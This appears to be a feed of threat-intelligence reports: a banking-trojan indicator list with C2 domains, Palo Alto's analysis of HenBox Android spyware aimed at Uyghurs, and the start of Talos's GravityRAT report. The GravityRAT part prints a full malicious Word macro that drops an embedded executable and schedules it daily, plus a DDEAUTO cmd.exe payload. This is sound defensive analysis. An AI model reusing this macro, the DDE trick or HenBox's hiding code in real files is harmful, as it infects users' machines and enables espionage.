MD5 03e4f8327fbb6844e78fda7cdae2e8ad pvk2pfx.exe [Legit Windows Tool]
URL hxxp://
URL hxxp:// 
C2 ibamanetibamagovbr[.]org/virada/pz/logs.php
URL sistemasagriculturagov[.]org
URL hxxp://
Campaign #2
MD5 2999724b1aa19b8238d4217565e31c8e AutoIT Dropper
MD5 181c8f19f974ad8a84b8673d487bbf0d img1.jpg [lLegit Windows Tool]
MD5 d3f845c84a2bd8e3589a6fbf395fea06 img2.jpg [Banking Trojan]
MD5 2365fb50eeb6c4476218507008d9a00b Variants of Banking Trojan
MD5 d726b53461a4ec858925ed31cef15f1e Variants of Banking Trojan
MD5 a8b2b6e63daf4ca3e065d1751cac723b Variants of Banking Trojan
MD5 d9682356e78c3ebca4d001de760848b0 Variants of Banking Trojan
MD5 330721de2a76eed2b461f24bab7b7160 Variants of Banking Trojan
MD5 6734245beda04dcf5af3793c5d547923 Variants of Banking Trojan
MD5 a920b668079b2c1b502fdaee2dd2358f Variants of Banking Trojan
MD5 fe09217cc4119dedbe85d22ad23955a1 Variants of Banking Trojan
MD5 82e2c6b0b116855816497667553bdf11 Variants of Banking Trojan
MD5 4610cdd9d737ecfa1067ac30022d793b Variants of Banking Trojan
MD5 34a8dda75aea25d92cd66da53a718589 Variants of Banking Trojan
MD5 88b808d8164e709df2ca99f73ead2e16 Variants of Banking Trojan
MD5 d3f845c84a2bd8e3589a6fbf395fea06 Variants of Banking Trojan
MD5 28a0968163b6e6857471305aee5c17e9 Variants of Banking Trojan
MD5 1285205ae5dd5fa5544b3855b11b989d Variants of Banking Trojan
MD5 613563d7863b4f9f66590064b88164c8 Variants of Banking Trojan
MD5 3dd43e69f8d71fcc2704eb73c1ea7daf Variants of Banking Trojan
C2 https[:]//panel-dark[.]com/w3af/img2.jpg
C2 https[:]//panel-dark[.]com/w3af/img1.jpg

Go to Source
Author: Edson Sierra

HenBox: Inside the Coop


On March 13, 2018, we published a blog describing a new Android malware family we discovered and called “HenBox” based on metadata found in most of the malicious apps. HenBox apps masquerade as others such as VPN apps, and Android system apps; some apps carry legitimate versions of other apps which they drop and install as a decoy technique. While some of legitimate apps HenBox uses as decoys can be found on Google Play, HenBox apps themselves are found only on third-party (non-Google Play) app stores.

HenBox apps appear to primarily target the Uyghurs – a Turkic ethnic group living mainly in the Xinjiang Uyghur Autonomous Region in North West China.

HenBox has ties to infrastructure used in targeted attacks, with a focus on politics in South East Asia. These attackers have used additional malware families in previous activity dating to at least 2015 that include PlugX, Zupdax, 9002, and Poison Ivy.

HexBox apps target devices made by Chinese consumer electronics manufacture, Xiaomi and those running MIUI, Xiaomi’s operating system based on Google Android. Furthermore, the malicious apps register their intent to process certain events broadcast on compromised devices in order to execute malicious code. This is common practice for many Android apps, however, HenBox sets itself up to trigger based on alerts from Xiaomi smart-home IoT devices, and once activated, proceeds in stealing information from a myriad of sources, including many mainstream chat, communication and social media apps. The stolen information includes personal and device information.

The main purpose of this follow-up blog is to provide additional information, and detailed analysis, about HenBox apps.

Delivery and Installation

During our investigation, we discovered one HenBox app previously hosted on the third-party Android app store, “uyghurapps[.]net”. This HenBox variant masqueraded as the legitimate VPN application, “DroidVPN”, and carried the app as an asset, embedded within itself. Once HenBox installs on a compromised device, it begins the installation process for the legitimate DroidVPN.

At the time of writing, we are unaware of any HenBox apps hosted on other third-party app stores; given the high volume of HenBox apps analyzed in our Wildfire sandbox, we can only speculate as to how other apps are delivered to victims; much of the Android malware seen in the wild tends to be delivered via third-party app stores, forums and file-sharing platforms, and of course by via ubiquitous phishing emails.

HenBox Decoys

Further analysis of the HenBox malware family is below, however, on the subject of masquerading apps, and installing embedded apps, it’s worth explaining how this decoy technique works.

The HenBox variant being described here relates to that listed in Table 1, below, which masquerades as DroidVPN; other apps were used with decoys, and are described in more detail in the previous blog.

APK SHA256 Size (bytes) First Seen App Package name


App name
0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7 2,740,860 May 2016 DroidVPN

Table 1 HenBox variant using decoy techniques

Once HenBox is installed, and launched by the victim, the app starts the installation process of the legitimate, embedded app by executing the following code.

Intent localIntent = new Intent("android.intent.action.VIEW");

localIntent.setDataAndType(Uri.fromFile(new File(str)), DaemonServer.a(new char[] { 56, 41, 41, 53, 48, 58, 56, 45, 48, 54, 55, 118, 47, 55, 61, 119, 56, 55, 61, 43, 54, 48, 61, 119, 41, 56, 58, 50, 56, 62, 60, 116, 56, 43, 58, 49, 48, 47, 60 }));


Having created a new intent – android.intent.action.VIEW – at run-time, as opposed to declared statically in the app’s AndroidManifest.xml, the remaining code configures parameters relating to the embedded decoy app. The first argument to setDataAndType() contains said decoy app’s filename – res.apk – referenced as “str”.

Method a() of the DaemonServer class contains an XOR routine to decode the byte string argument using, in this case, a single-byte key 0x59. The following code snippet shows the decoded output used as the second argument to setDataAndType();


The decoded string shown above represents the Multipurpose Internet Mail Extensions (MIME) type associated with APK (Android app package) files.

Calling startActivity() with this intent configuration triggers Android to provide a handler – most likely the app package manager – that would prompt the victim to install the embedded application. Given, in this case, the victim most likely intended to install a VPN app, this secondary install for that app should come as no surprise, however, it’s likely the HenBox installation process would have also occurred and may have been more suspicious. Potential victims are likely lured into installing the apps through the use of app names, iconography, or other similar traits to those apps being sought; some HenBox apps purport to be system or back-up apps that may appear plausible to the victim.

Inside the Coop -HenBox Analysis

The following description is based on the HenBox app listed in Table 3 below. The reason for choosing this app for more detailed analysis, was the significant ties to infrastructure seen also having hosted Windows malware, such as PlugX.

SHA256 Package Name App Name First seen

fdc3b566bfcedcdf5a338c3a97c9f249b 备份 (Backup) Aug 29th 2017

Table 2 HenBox variant used in description

The majority of HenBox apps, including this one, used the following developer signature information to sign the APK file.

CN=henbox, OU=henbox, O=henbox, L=Guangzhou, ST=Guangdong, C=CN

A smaller subset of HenBox apps used the “Android Debug” signature used typically when developers are testing their development. This shortcut is used to sign malicious apps, rather than the adversary creating their own signature, however there can be limitations as to where the app can be hosted and installed when using it. Recent HenBox apps have the common name (CN) changed to “h123enbox” or the entire signature as, simply, “C=cn”, where ‘C’ is the certificate attribute for Country.

The following figures illustrate the structure of a typical HenBox app, how they are delivered, and the app behavior once installed.


Figure 1 HenBox app delivery and structure

In Figure 1 we included three methods for delivering HenBox commonly used by threat actors to deliver Android malware: websites, such as forums, phishing emails, and third-party app stores. It is likely HenBox is also delivered via the same methods. However, as previously mentioned, we do not have current visibility into delivery methods other than third-party app stores, for which we saw one instance.

To our knowledge, user interaction is required to install HenBox apps. Given the third-party app store we observed serving HenBox, and the decoy apps used, it’s clear the adversary relies heavily on social engineering techniques to compromise their victims.

Most HenBox apps seen to date contain a similar structure of files and components within the APK package. Optionally, as shown with the dotted line in Figure 2, and as described with the DroidVPN example earlier, HenBox apps may include an embedded APK file for use as a decoy. Another example of this is a HenBox sample that purports to be the popular online video platform iQiyi. That platform has over 500 million unique users, almost half of which are mobile viewers, providing yet another popular decoy app with which to social engineer potential victims.

Figure 1 above describes the structure of the HenBox app listed in Table 2 above. The numbered components from Figure 1 are listed in more detail in Table 3 below and described afterwards. Some of the components are RC4 encrypted using the downloaded-string key “a85fe5a8”; other components are XOR-encoded using various key values. Native libraries, in the form of Executable and Linkable Format (ELF) files, are common to HenBox samples and the Java Native Interface (JNI) allows the Android app components to communicate with and execute functions in these libraries.

# Filename Obfuscation


Type Purpose
1 ./assets/b.dat RC4(Zlib) ELF Interacts with other components inside the archive.
2 ./lib// N/A ELF Baidu library for device geo-location data.
3 ./lib// N/A ELF Handlies RC4 decryption, Zlib decompression and HTTP network communication.
4 ./assets/sux (and suy) XOR (0x51) ELF Contains embedded SU (Super User) and other root-related capabilities to run privileged commands; Harvests messages and other private data from popular messaging and social media apps.
5 ./classes.dex N/A DEX Main Dalvik file containing Java for HenBox
6 ./assets/setting.txt XOR (0x88) Data Config file containing C2 and other information
7 ./assets/daemon N/A ELF Starts services, monitors environment settings and system logs.
8 ./assets/ RC4(ZIP) Archive Zip archive containing two files
9 ./assets/ N/A ELF Library handling various activities including loading a secondary Dalvik DEX file (lib.dat)
10 ./assets/ RC4(Zlib) DEX Dalvik file for parsing config file, monitoring out-going calls, intercepting SMS messages and more.

Table 3 Contents and components of this HenBox variant

Chickens in flight

There are two methods to execute HenBox’s malicious code. The first method, as depicted by Figure 2 below, is automatic based on the operating system generating one of a handful of broadcasts that HenBox registered its intent to process during the app installation process. Examples include events like device reboots or when an app is newly installed. The list of all the intents registered statically via HenBox’s AndroidManifest.xml file are described in the appendix below; HenBox also registers further intents at run-time.


Figure 2 HenBox execution via Intents and External Triggers

Most of the intents listed in the appendix, and in Figure 2, are commonly found in malicious Android apps, and are the equivalent of setting registry run keys on Windows to autostart applications under certain conditions. One intent stands out and is much less common to see – com.xiaomi.smarthome.receive_alarm.

Xiaomi, a privately owned Chinese electronics and software company, is the 5th largest smart phone manufacturer in the world, manufacturing IoT devices for the home. Devices range from smart lights to smart rice cookers, and much more in-between. Devices are controlled using Xiaomi’s “MiHome” app, which has been downloaded between 1,000,000 and 5,000,000 times.

Given the nature of connected devices in smart homes, it’s highly likely many of these devices, and indeed the controller app itself, communicate with one another sending status notifications, alerts and so on. Such notifications, received by the MiHome app can also be processed by other apps, provided they register their intent to do so, such as HenBox. Essentially, this allows for external IoT devices to act as a trigger to execute the malicious HenBox app’s code.

Triggered intents result in execution of code that’s present in either the BootReceiver or TimeReceiver classes, both of which ultimately lead to a new instance of the DaemonServer service being created and started. This service is discussed in more detail later. In addition, BootReceiver changes the device ringer mode to a value of 2, which results in ringtones being audible, and setting vibrate mode on. This may have been done in an attempt to have nearby people interact with the (now noisy) device such that information stolen may be richer in content. For more information on these intents and their purpose, please see the appendix.

The alternative method for executing the HenBox code is for the user to launch the malicious app from the launcher view on their device, as shown in Figure 3.


Figure 3 HenBox app present in Launcher View on Android

Upon manual launch, HenBox code executes and performs the steps highlighted in Figure 4 below.


Figure 4 HenBox execution via human interaction

Firstly, checks are made to determine whether the device manufacturer is Xiaomi, or the firmware is MIUI (Xiaomi’s fork of Android). The intention here seems to be one of targeting Xiaomi and exiting prematurely if the checks fail, however poorly written code results in execution in more environments than the adversary perhaps wanted. Further checks try to ascertain whether HenBox is running on an emulator, perhaps being cautious around potential researcher environments. Interestingly, the code for these additional checks are concealed inside a class called AlarmService, which is appears to be code from online tutorials for Android developers, perhaps to hide the adversary’s code from plain sight. Assuming these checks pass, HenBox continues to execute by next loading the ELF library; its functionality is discussed later in this blog.

Using Android’s shared preferences feature to persist XML key-value pair data, HenBox checks whether this execution is its first. If it is, and if the app’s path does not contain “/system/app” (i.e. HenBox is not running as a system app, which provides elevated privileges), one of two embedded “su?” ELF libraries are XOR-decoded. A JNI call is then issued to passing three strings – the app’s package name, the package name including the current class, which is “MainActivity”, and the path to the HenBox app. This JNI call leads to the execution of the “su?” (henceforth sux) binary, which is also discussed in more detail later.

The two files – “suy” and “sux” – are essentially the same; “sux” is used if the Android version on the victim’s device is 4.1 (aka “Jelly Bean”) or newer; “suy” will be used for older versions.

Finally, an instance of the DaemonServer service starts and, if a decoy app is embedded inside HenBox, as per the DroidVPN example, the installation process for it also starts.

DaemonServer Class

Figure 5 below illustrates the typical behavior of the DaemonServer service, starting with hiding the HenBox app from the launcher view and the app drawer/tray. This behavior is common amongst Android malware and, while the app remains installed with its services running, it is harder to discover by the victim. The non-obfuscated ELF file “daemon” is loaded next; the program gathers environmental information about the device by accessing system and radio log files, and by querying running processes.


Figure 5 HenBox’s DaemonServer Service code execution flow

A Baidu library is used to for gathering device geo-location information; another run-time intent is registered to intercept outgoing phone calls, allowing HenBox to check the number dialed for prefixes matching “+86” – the country code for the People’s Republic of China. Interestingly, instead of using Baidu’s coordinate system, HenBox specifies the GCJ-02 alternative provided by the Chinese State Bureau of Surveying and Mapping. According to public sources, this system adds apparently random offsets to both the latitude and longitude, with the alleged goal of improving national security.

Further assets are then deployed and decoded, if necessary, including and setting.txt. Code is present in this variant to also deploy assets named “plugin” and “AppVoice”, however, they are not present in this sample, a likely indication of evolving development and use of multiple components, depending the adversary’s needs at a given time.

HenBox’s config file, setting.txt, is decoded using XOR with a single-byte key, 0x88; filenames and XOR keys differ occasionally between variants. Once de-obfuscated, the config file’s contents resembles something like the following text:


Interestingly, open source research indicates the email address in the above HenBox config file belongs to a scholar of Cyber Security at the University of the Chinese Academy of Sciences in Beijing, China. They are listed as an author on the paper “Recognition of Information Leakage of Computer via Conducted Emanations on the Power Line.” Why the email appears in the configuration file of HenBox malware is not known at the time of writing.

Currently, it’s not known to us exactly how all these parameters are used, however some of the domains (or IP addresses in other variants) are used as the C2 for the threat actors.

Finally, a worker thread is then created that sets various components running in the background. One of the key components used is the ELF file named “b.dat”, which in turn interacts with “”. The archive file contains two further files: (another ELF file) and lib.dat, which is actually a Dalvik DEX file containing further Java code for the app’s behavior, beyond the default classes.dex file. Some of the key data-harvesting behavior of HenBox stem for these files – b.dat and the contents of – all four of which are RC4-encrypted, forming the most heavily obfuscated components within HenBox.

Once unpacked and available for use, the new DEX file is executed from within the DaemonServer class of the main HenBox app. A DexClassLoader object is created and a loadClass method is called for a class “com/common/ICommonFun” contained within the once deeply-nested, and obfuscated secondary DEX file. From the newly-loaded class, a method is called to invoke further HenBox capabilities, including enumerating all running applications and killing those that have the permission to receive SMS messages, before registering its own run-time Intent to do so, and thus intercept the victim’s messages.

The method continues next by loading the library file, also unpacked from the archive. This ELF file has numerous capabilities, many of which stem from using a built-in version of BusyBox – a package containing various stripped-down Unix tools useful for administering such systems. This executable interacts with the aforementioned sux executable and, amongst other things, temporarily disables the noise made by the device when photos are taken. This is achieved by moving the audio file “/system/media/audio/ui/camera_click.ogg” elsewhere, and back again once the picture-taking is complete.

Dynamic C2s

At the time of writing, three HenBox variants, all seen in early April 2017, gathered their C2 addresses dynamically. The three are listed in Table 3, below.

SHA-256 Package Name App Name First Seen

9f70eb95c6387cb8ec837bd2beb14d6 备份 (Backup) April 2nd 2017

6a6eeeaeada829c16122a39cb101dbf 备份 (Backup) April 2nd 2017

8ce2d35fff91caf1be367f7e4b510b054 备份 (Backup) April 1st 2017

Table 4 HenBox variants using dynamic C2s

As previously mentioned, HenBox config files contain the C2 information for the malware. In the case of the three variants listed in Table 3, the C2 address was[.]cn/s/blog_772696fb0102wemg.html. The content of the site, at the time of writing, is shown in Figure 6 below.


Figure 6 Example website hosting the HenBox C2 information

The blog contains structured text strings beginning with “ConnectURL” that, when parsed, provide the IP address and port number for HenBox to use as its C2.


Typically masquerading as legitimate Android system apps, and sometimes embedding legitimate apps within them, the primary goal of the malicious HenBox apps appears to be to spy on those who install them. Using similar traits, such as copycat iconography and app or package names, victims are likely socially engineered into installing the malicious apps, especially when available on so-called third-party (i.e. non-Google Play) app stores which often have fewer security and vetting procedures for the apps they host. It’s possible, as with other Android malware, that some apps may also be available on forums, file-sharing sites or even sent to victims as email attachments, and we were only able to determine the delivery mechanism for a handful of the apps we have been able to find.

The hosting locations seen for some HenBox variants, together with the nature of some embedded apps including: those targeted at extremist groups, those who use VPN or other privacy-enabling apps and those who speak the Uyghur language, highlights the victim profile the threat actors were seeking to attack. The targets and capabilities of HenBox, in addition to the ties to previous activity using four different Windows malware families with political-themed lures against several different South East Asian countries, indicates this activity likely represents an at least three year old espionage campaign.

Palo Alto Networks customers are protected by:

Autofocus customers can investigate this activity using the following tag. To date we believe HenBox is not a shared tool, however, the remainder of malware used by these attackers is shared amongst multiple groups:

Android Hygiene

Update: Keep installed apps updated. Much like patching Operating System and application files on PCs, Android and apps developed for the platform also receive security updates from Google and app developers to remove vulnerabilities and improve features, including security.

Review: App permissions to see what the app is potentially capable of. This can be quite technical but many permissions are named intuitively describing if they intend to access contacts, messages or sensors, such as the device microphone or camera. If you the permission seem over the top compared to the described functionality, then don’t install. Also read the app and developer reviews to evaluate their trustworthiness.

Avoid: 3rd party app stores that may host pirated versions of paid apps from the Google Play app store, often such apps include unwanted extra features that can access your sensitive data or perform malicious behaviors. Also avoid rooting devices, if possible, as apps could misuse this power.


The following analysis is based on the HenBox Android APK file listed in Table 5 below.

SHA256 Package Name App Name First seen

fdc3b566bfcedcdf5a338c3a97c9f249b 备份 (Backup) Aug 29th 2017

Table 5 HenBox app detailed in the analysis

The permissions declared statically in the AndroidManifest.XML file are pretty aggressive, and in line with what you would expect from this type of espionage Android malware. Table 6 below lists and describes the Android permissions declared for this variant of HenBox.

Category Permission Description
System KILL_BACKGROUND_PROCESSES The ability to kill processes associated to given packages may allow the app to stop security apps, or those that may be running, which it is attempting to imitate or install.
System WAKE_LOCK Allows for the CPU to be kept awake, and screen on, for background tasks to continue.
System WRITE_SETTINGS** Ability to modify system settings
System RECEIVE_BOOT_COMPLETED Can receive the broadcast message when system finishes booting.
System READ_LOGS Allows for reading the low-level system log files.
System GET_TASKS Retrieve the list of running tasks from all apps.
Storage MOUNT_UNMOUNT_FILESYSTEMS (un)mount file systems for removable storage access.
Storage WRITE_EXTERNAL_STORAGE Write to external storage.
Sensors CAMERA Access the device camera(s)
Sensors RECORD_AUDIO Record audio through device microphone
Network INTERNET Ability to open network sockets
Network ACCESS_NETWORK_STATE Access information about phone networks
Network ACCESS_WIFI_STATE Access information about WiFi networks
Network CHANGE_WIFI_STATE Change Wi-Fi connectivity state
Network CHANGE_NETWORK_STATE** Change network connectivity state
Messages READ_SMS Read SMS messages
Messages RECEIVE_SMS Receive SMS messages
Messages SEND_SMS Send SMS messages
Messages WRITE_SMS** Write SMS messages
Location ACCESS_COARSE_LOCATION Access approximate location
Location ACCESS_FINE_LOCATION Access precise location
Contacts READ_CONTACTS Read user’s contacts data
Contacts WRITE_CONTACTS  Write to the user’s contacts data
Calls READ_PHONE_STATE Read-only access to device phone number, current cellular network information and the status of any ongoing calls.
Calls READ_CALL_LOG Read the call log of previous outgoing, incoming and missed calls.
Calls READ_PHONE_STATE (duplicate) (see above)
Calls PROCESS_OUTGOING_CALLS Ability to see the number being dialed during an outgoing call with the option to redirect the call to a different number or abort the call altogether
Calls CALL_PHONE Initiate a phone call without going through the Dialer user interface for the user to confirm the call
Calls WRITE_CALL_LOG Write to the user’s call log data
Calendar READ_CALENDAR Read the user’s calendar data
Browser browser.permission.


Access browsing history from web browser(s)

Table 6 Typical permissions requested by HenBox

**Some permissions are deprecated in recent Android versions, or now require more stringent permission requests including user-interaction for secondary permission acceptance; in some cases, 3rd party apps may no longer be allowed to use some of the listed permissions. The ability to write SMS messages, for example, was overhauled in version 4.4 (aka KitKat) some 4 years ago.

Some variants have slightly differing permissions; noteworthy that some recent variants of HenBox have included Bluetooth related permissions, as detailed in Table 7 below.

Category Permission Description
Network BLUETOOTH Allows applications to connect to paired bluetooth devices
Network BLUETOOTH_ADMIN Allows applications to discover and pair bluetooth devices.

Table 7 Additional permissions in more recent HenBox variants

Once the user installs the app, two services are registered, as shown in Figure 7 below – showing an extract from this app’s AndroidManifest.xml file.


Figure 7 AndroidManifest.xml service declarations

Both services have been discussed already but to recap, DaemonServer is responsible for hiding the malicious app, enabling location tracking and gathering phone numbers called from the device, with specific interest of Chinese numbers; further components are also unpacked and launched when this class is instantiated and run.

AlarmService contains an approximate copy of Google’s Android API demo code for creating alarm and timer apps. Extra classes and methods have been added providing functionality to HenBox, including anti-debug and anti-analysis code capable of detecting if the app is running within emulator, and possibly research analysis, environments.

Manifest-declared priority values of 1000 are set for both services, as shown in Figure 7, albeit erroneously. Setting high, or in this case maximum, values in the priority attribute is a trick typically used when declaring intents and receivers for system broadcasts to ensure certain apps (often malicious) are executed ahead of intended apps that would handle such events. There is no such priority concept for services; the operating system alone controls service CPU time, according to how busy the device is and how much resource remains.

The attribute “exported”, shown in Figure 7, relates to whether or not components of other applications can invoke the service, or interact with it — “true” if they can; “false” if not. This immediately makes DaemonServer a little more interesting.

Android receivers and are also declared in the AndroidManifest.xml to receive broadcast messages under certain conditions. BootReceiver, as per the services listed in Figure 7 above, has its priority attribute (correctly) set to 1000, allowing certain intent-filters to trigger and run the malicious receiver above the receivers and matching intents from other apps.

The intent filters listed in the AndroidManifest.xml are briefly described in the Table 8 below, together with the receivers they refer to.

Receiver Intent Name Description
BootReceiver android.intent.action.BOOT_COMPLETED System notification that the device has finished booting.
android.intent.action.restart A legacy intent used to indicate a system restart.
android.intent.action.SIM_STATE_CHANGED System notification that the SIM card has changed or been removed.
android.intent.action.PACKAGE_INSTALL System notification that the download and eventual installation of an app package is happening (this is deprecated)
android.intent.action.PACKAGE_ADDED System notification that a new app package has been installed on the device, including the name of said package.
com.xiaomi.smarthome.receive_alarm Received notifications from Xiaomi’s smart home IoT devices.
TimeReceiver android.intent.action.ACTION_TIME_CHANGED System notification that the time was set.
android.intent.action.CONNECTIVITY_CHANGE System notification that a change in network connectivity has occurred, either lost or established. Since Android version 7 (Nougat) this information is gathered using other means, perhaps inferring the devices used by potential victim run older versions of Android.

Table 8 HenBox intents declared statically in AndroidManifest.xml

Most of the intents listed are commonly seen in malicious, information-stealing Android apps that wish to hook certain common events, such as system reboots, network changes, new apps installed and so forth, acting as a trigger to their code.

As mentioned earlier, HenBox registers a much less common and more interesting intent filter – com.xiaomi.smarthome.receive_alarm. This relates to Xiaomi’s smart home IoT devices, and their MiHome controller app for smartphones. Broadcasts or notifications from such Xiaomi’s devices, which would usually be processed by the MiHome app, could now also be processed by HenBox, acting as a trigger to launch its malicious behavior.

Whichever Intent triggers HenBox will execute code declared in BootReceiver or TimeReceiver; both receivers’ code resembles the snippet below, which starts a new instance of the service DaemonServer and increment an integer by 1.

DaemonServer.d += 1;
paramContext.startService(new Intent(paramContext, DaemonServer.class));

BootReceiver also executes the following line of code, resulting in the device’s ringer mode being set to audible and vibrate mode on.


The purpose for this additional behavior in BootReceiver is unknown but given the requested permissions, the capability to gather information from device sensors, such as the microphone and cameras, it’s feasible the intention of changing the ringer settings is to encourage interaction with the device by anyone nearby, perhaps leading to richer content of the data being exfiltrated.

Aside from using Intents and Receivers to launch HenBox, as mentioned above, there is an alternative – launching the app manually from the launcher view on Android, as shown in Figure 8 below. Doing so results in code in the MainActivity class being executed, which is equivalent to a Windows Portable Executable (PE) file’s entry point.


Figure 8 Android app launcher view and the HenBox app

Specifically, the onCreate() method in the MainActivity class is executed. This code performs some initial checks of the device manufacturer and Operating System before continuing. The actors seemed to be interested only in Xiaomi devices, or Xiaomi’s fork of Android called MIUI (“Me You I”) running on any device. The code performing these checks is buggy and results in execution in more environments then perhaps anticipated.

Continuing with the device checks, HenBox performs various well-documented anti-emulator checks, such as querying the device phone number, device IDs, IMSI, various QEMU-related environment settings, hardware configurations and other notable strings to compare against known constants that would infer an emulator device, which are commonly used for app analysis. Finally, they check for tainted Operating Systems, such as the presence of TaintDroid code used for tracking app behavior.

Android’s shared preferences feature is used to persist information beyond the lifetime of the app execution, and to retrieve said information, should it exist. HenBox uses this feature to symbolize if the malware has already run. The strings used to denote this are XOR-encoded with single-byte key, 0x59; a helper method in the DaemonServer class is used for decoding. The strings are listed in Table 9 below.

# Encoded Decoded
1 41 43 60 63 60 43 60 55 58 60 Preference
2 31 48 43 42 45 11 44 55 FirstRun
3 0 28 10 YES
4 118 42 32 42 45 60 52 118 56 41 41 /system/app

Table 9 Example HenBox XOR encoded strings

HenBox attempts to hide itself from the app launcher view by running the following code, passing the parameters COMPONENT_ENABLED_STATE_DISABLED (2) and DONT_KILL_APP (1) to the setComponentEnabledSetting() method.

getPackageManager().setComponentEnabledSetting(new ComponentName(this, MainActivity.class.getName()), 2, 1);

DaemonServer Service

To recap, the DaemonServer Service is launched either through the two receivers’ intent filters being triggered by certain events occurring on the device, or through launching the app manually. Either way, the registered service’s entry-point method, onCreate(), is executed.

Location tracking for the device is enabled using the libraries carried within the HenBox APK file. However, instead of using Baidu’s coordinate system, HenBox specifies the GCJ-02 alternative provided by the Chinese State Bureau of Surveying and Mapping. According to public sources, this system adds apparently random offsets to both the latitude and longitude, with the alleged goal of improving national security.

DaemonServer continues by setting up a PhoneStateListener object instance, customized to handle cases of phone numbers starting with “+86” (country dialing code for China), and listens for changes to the device call state. A run-time, high-priority intent filter is setup for android.intent.action.NEW_OUTGOING_CALL, so as to inform HenBox when a phone call is made. The associated receiver – BroadcastReceiver – retrieves the phone number being dialed using the getStringExtra(“android.intent.extra.PHONE_NUMBER”) method call.


For a full list of SHA256 hashes, their first encountered timestamp, and details of Android package and app names relating to over 200 apps, please refer to the following file on GitHub.

The post HenBox: Inside the Coop appeared first on Palo Alto Networks Blog.

Go to Source
Author: Alex Hinchliffe

GravityRAT – The Two-Year Evolution Of An APT Targeting India


Today, Cisco Talos is uncovering a new piece of malware, which has remained under the radar for the past two years while it continues to be developed. Several weeks ago, we identified the use of the latest version of this RAT (Remote Access Tool). In this article, we will discuss the technical capabilities, the evolution, development and potential attribution of what we are calling GravityRAT.

GravityRAT has been under ongoing development for at least 18 months, during which the developer has implemented new features. We’ve seen file exfiltration, remote command execution capability and anti-vm techniques added throughout the life of GravityRAT. This consistent evolution beyond standard remote code execution is concerning because it shows determination and innovation by the actor.

Throughout our investigation, we observed several malicious documents used to attack victims, which we will discuss. These malicious documents were used by the developer to run several tests on the popular analysis platform VirusTotal. Using VirusTotal allowed the developer to make changes in an attempt to decrease antivirus detection.

Although GravityRAT has not been previously published or discussed, there was some information from the National Computer Emergency Response Team (CERT) of India describing GravityRAT as being used in targeted attacks against India. Finally, we will discuss specific attribution elements discovered during our research into GravityRAT as we identify specific information, which we believe to be leaked by the developer, such as location, and potentially their first name.



Malicious Office Documents

The majority of the malicious documents crafted by the malware author are Microsoft Office Word documents. The attacker uses an embedded macro in order to execute malicious code on the victim’s system. The document opens and appears as such:

The document asks to the user to enable macros in order to prove that the user is not a robot (similar to the CAPTCHA we often see on the internet). This, however, is a known tactic that a lot of Office-based malware uses. It is an attempt to trick any users who are using Protected Mode on their systems. By enabling macros, the malware is able to begin it’s execution. We discovered that the embedded macro is quite small when extracted.

Sub AutoOpen()
  If Not Dir(Environ("TEMP") + "\image4.exe") <> "" Then
    Const lCancelled_c As Long = 0
      Dim sSaveAsPath As String
      sSaveAsPath = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%Temp%") + "\"
      If VBA.LenB(sSaveAsPath) = lCancelled_c Then Exit Sub
      Application.Documents.Add ActiveDocument.FullName
      ActiveDocument.SaveAs sSaveAsPath
      Set app = CreateObject("Shell.Application")
      ExtractTo = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%Temp%")
      ExtractByExtension app.NameSpace(Environ("TEMP") + "\"), "exe", ExtractTo
  End If
End Sub

Sub ExtractByExtension(fldr, ext, dst)
  Set FSO = CreateObject("Scripting.FileSystemObject")
  Set app = CreateObject("Shell.Application")
  For Each f In fldr.Items
    If f.Type = "File folder" Then
      ExtractByExtension f.GetFolder, ext, dst
    ElseIf LCase(FSO.GetExtensionName(f.Name)) = LCase(ext) Then
      If Not Dir(Environ("TEMP") + "\image4.exe") <> "" Then
        app.NameSpace(dst).CopyHere f.Path, &H4
      End If
    End If
  Shell "schtasks /create /tn wordtest /tr ""'%temp%\image4.exe' 35"" /sc DAILY /f /RI 10 /du 24:00 /st 00:01"
End Sub

This macro contains three functions:

  • The first one is executed when the document is opened. The purpose is to copy the active document (the opened Word document) in a temporary directory and to rename it as a ZIP archive. Indeed, the docx format is, in fact, a common ZIP archive, and can be unzipped using common tools.
  • The second function decompresses this ‘’ file and extracts the .exe file stored in it.
  • The third creates a scheduled task, named ‘wordtest’, to execute this malicious file every day.

With this approach, the attacker ensures that there is no direct execution (the executable is executed thanks to scheduled tasks), there’s no download of an additional payload, and finally, the author uses the fact that the docx format is an archive in order to include its executable (GravityRAT).

Testing By The Author

During our tracking, we identified several malicious documents submitted from this actor on VirusTotal for testing purposes. They tested the detection on macros (by modifying them, or by executing the calc instead of the malicious payload) and the developers tried dynamic data exchange (DDE) execution in the Office document. This is abusing the DDE protocol which exists within Microsoft Office documents. Whilst this is a feature Microsoft provide it is also a feature that an attacker can leverage for malicious activity, Microsoft published mitigation information here previously. The developer crafted Office Word and Excel documents to see the detection in VirusTotal. The authors tried to hide the DDE object in a different part of the document — in the main object and the header, for example. The DDE object simply executes Microsoft calc in the detected sample. Here is an example:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<w:document [...redated...}] mc:Ignorable="w14 w15 wp14"><w:body><w:p w:rsidR="00215C91" w:rsidRDefault="008C166A"><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText xml:space="preserve"> </w:instrText></w:r><w:r><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="383838"/><w:spacing w:val="3"/><w:sz w:val="26"/><w:szCs w:val="26"/><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/></w:rPr><w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"</w:instrText></w:r><w:r><w:instrText xml:space="preserve"> </w:instrText></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/></w:p><w:sectPr w:rsidR="00215C91"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

We believe the filenames of the submitted samples are clearly testing docs, using different methods and Office tricks to attempt to ensure his malware was undetected. Those names were:

  • testnew1.docx
  • Test123.docx
  • test456.docx
  • test2.docx
  • book1test2.xlsx
  • Test123.doc


